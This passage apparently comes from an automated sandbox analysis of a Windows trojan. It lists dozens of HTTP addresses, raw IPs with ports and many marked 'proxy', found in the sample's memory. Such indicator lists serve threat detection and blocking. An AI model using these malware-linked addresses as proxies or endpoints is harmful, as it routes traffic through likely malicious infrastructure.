                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.102.179.21:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.125.246.223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.125.246.223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.125.246.223:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.126.187.77
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.126.187.77://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.126.187.77:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.135.166.24
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.135.166.24://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.135.166.24:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.145.53.40:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.145.53.40:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA90C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.29.41.58:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.29.41.58:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.64.4.17
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.64.4.17://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.64.4.17:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.80.202.6:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.80.202.6:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.81.72.31
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.81.72.31://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.81.72.31:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.103.220
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.103.220://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.103.220:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.92.12.210:9238
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.92.12.210:9238://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.95.243.122:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.95.243.122:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.180.188.216
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.180.188.216://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.180.188.216:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.185.196.38:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C921B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.185.196.38:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.185.254.159
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.185.254.159://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C792E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.189.183.169:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.189.183.169:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DB9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C766B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.194.228.247:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.194.228.247:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.200.161.98
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.200.161.98://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.200.161.98:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.209.198.222
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.209.198.222://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.209.198.222:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C778C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.225.16.82:2387
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.225.16.82:2387://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.243.227.100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.243.227.100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.243.227.100:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.72.118.126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.72.118.126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.72.118.126:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.79.120.242:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.79.120.242:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.111.143.8:15777
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.111.143.8:15777://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.211.1:55438
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.211.1:55438://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA588000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.62.198:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.62.198:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.87.133:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.81.135:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.81.135:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC84E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.103:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.103:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.247:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.247:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.72:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.6.144.72:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.2.242:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.2.242:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.238.82:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.238.82:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.27.123:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.27.123:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.62.111:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.62.111:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.173.145:45685
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.173.145:45685://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.34.10:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.34.10:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:49524
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:49524://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76AF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.77.41:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.77.41:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.7.252.165:3256
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.7.252.165:3256://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.88.11.215
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.88.11.215://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.88.11.215:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.10.51:44268
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.10.51:44268://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.251.210:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.251.210:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.85.249:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.89.85.249:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51299
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51299://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51672
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.45.12:51672://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.98.115:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.98.115:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.111.49:52471
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.111.49:52471://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.140.113
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.140.113://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.140.113:80
